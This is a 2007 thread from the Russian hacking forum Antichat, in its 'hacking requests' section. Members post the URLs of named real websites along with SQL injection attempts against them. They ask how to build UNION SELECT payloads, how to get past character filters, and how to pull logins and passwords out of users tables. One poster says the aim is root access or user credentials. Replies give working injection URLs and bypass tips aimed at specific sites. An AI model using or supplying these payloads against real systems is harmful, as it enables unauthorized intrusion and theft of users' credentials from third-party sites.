HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 15.05.2007, 11:21
[alg0n
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
14433

Репутация: 0
Unhappy

http://www.koko.ee/pics.php?kat='

Не могу построить вразумительный sql-запрос. =(
 

  #62  
Старый 18.05.2007, 21:39
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow

пробуй посимвольно, как - смотри на форуме.
 

  #63  
Старый 12.06.2007, 23:10
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

http://www.ipodmania.ru/index.php?state=catalogs&activeCategory='182
что-то никак не осилю)
 

  #64  
Старый 13.06.2007, 01:22
slon_ru
Новичок
Регистрация: 05.06.2007
Сообщений: 1
Провел на форуме:
31597

Репутация: 0
По умолчанию

Кто шарит подскажите ....
просканил сайт Acunetix
типа уязвимый скрипт http://rhost.com/login.php
(The POST variable logf has been set to \'.) - из отчета Acunetix

Это форма из трех полей ввода: логин, пароль и плюс контрольное слово (с картинки)
Инфа о сервере: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7g PHP/5.2.1
параметры ' %27 %00' \' и тд типа проходят
вместо параметра id там походу используется op покрайней мере при входе на сайт под логином обычного юзверя почти

все ссылки внутри выглядят типа так:
http:/rhost.com/index.php?op=new_pro
В общем долго я извращался на тему:

http://rhost.com/login.php?op=-new_pro+ORDER+BY+8/*
http://rhost.com/login.php?op=-23+ORDER+BY+8/*
ну и тд и тп и пр ...(перепробовал уже кучу всего)

На все запросы выдает все тоже окно из 3х полей но каждый раз с новой картинкой
Вот исходный код зласчастной страницы:
<HTML><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
<LINK href="../themes/style.css" rel=stylesheet>
<body background="./images/bkgnd.gif" link="#FEE685" alink="#FEE685" vlink="#FEE685" leftmargin="0" topmargin="10">
<center><form ENCTYPE="multipart/form-data" action="login.php?op=enter" method=post>
<br><br>
<table border="0"><tr><td align="right"><font color="#A6D2C3">Логин</font></td>
<td><input type="text" name=logf size="15"></td></tr>
<tr><td align="right"><font color="#A6D2C3">Пароль</font></td>
<td><input type="password" name=pasf size="15"></td></tr>
<tr><td align="right"><font color="#A6D2C3">Код</font></td>
<td><input type="text" name="code" size="15"></td><td><img src="img.php"</td></tr>
<tr><td></td><td><a class="menu" href="register.php">Новый пользователь</a></td></tr>
<tr>
<td><br><input type="submit" name=enteradmin value="Войти"></td>
<td><br><input type="reset" value="Очистить" name="Reset"></center></td></tr></table>
<p>&nbsp;</p></div></form>
</BODY><HTML>

Вопросы следующие:
1. Значения параметра op= на сайте только текстовые (без чисел) - правильны ли мои попытки..??
2. Корректно ли вводить op= в случае с login.php а не с index.php
3. Не является ли препятствием то самое третье поле с картинки..??
4. У кого какие мысли ... в идеале нужен root или хотябы логины пароли простых юзверей
 

  #65  
Старый 14.06.2007, 01:07
assus
Новичок
Регистрация: 12.06.2007
Сообщений: 17
Провел на форуме:
124816

Репутация: 1
По умолчанию

http://www.p2p-forum.lt/index.php?sid=64c04cbc9333171625ab19a953c981b4

спасибо
 

  #66  
Старый 28.06.2007, 23:43
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию

Применять фильтр?

id=-99999+union+select+1,2,3,4,5,6,7,8

Warning: pg_query()

Query failed: ERROR: UNION types character varying and integer cannot be matched in /var/www/....

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/.....

А если id=-99999+union+select+1,USER(),3,4,5,6,7,8
ТО
Query failed: ERROR: syntax error at or near "(" at character 63 in /var/www....
 

  #67  
Старый 28.06.2007, 23:49
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию

Цитата:
Сообщение от MAAAD  
Применять фильтр?

id=-99999+union+select+1,2,3,4,5,6,7,8

Warning: pg_query()

Query failed: ERROR: UNION types character varying and integer cannot be matched in /var/www/....

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/.....

А если id=-99999+union+select+1,USER(),3,4,5,6,7,8
ТО
Query failed: ERROR: syntax error at or near "(" at character 63 in /var/www....
Понял, такая конструкция проходит

Код:
id=-99999+union+select+null,null,null,null,null,null,null,null
Но что теперь?
Код:
id=-99999+union+select+null,USER(),null,null,null,null,null,null
Опять выдаёт ошибку

Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near "(" at character 71 in /var/www/....../htdocs/inc/class.file.php on line 22

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/..........
htdocs/inc/class.file.php on line 23

АААА понял, скобку фильтрует сервер.
Вопрос: Как обойти?!

Как я понял фильтрация идёт на "." и на "," как можно обойти?!

ААА кто поможет?
foto.php?id=-1+union+select+1,user&#46password,null,4,null,6,7,8+from+user&#46password

Код:
Query failed: ERROR: each UNION query must have the same number of columns in /var/www....

Последний раз редактировалось MAAAD; 29.06.2007 в 12:43..
 

  #68  
Старый 09.07.2007, 20:39
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

maad может быть вот так /**/
у меня др вопрос, че можно с этим с делать
http://www.yavlinsky.ru/smart_talk/index.phtml?id=30%20union%20select%201,2,3/*
 

  #69  
Старый 09.07.2007, 20:48
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Цитата:
http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7 ,password,9,10+from+users/*
не могу найти поля логинов
 

  #70  
Старый 09.07.2007, 21:07
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Цитата:
Сообщение от Y.Dmitriy  
не могу найти поля логинов
Код:
http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,name,9,10+%20from+users/*
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ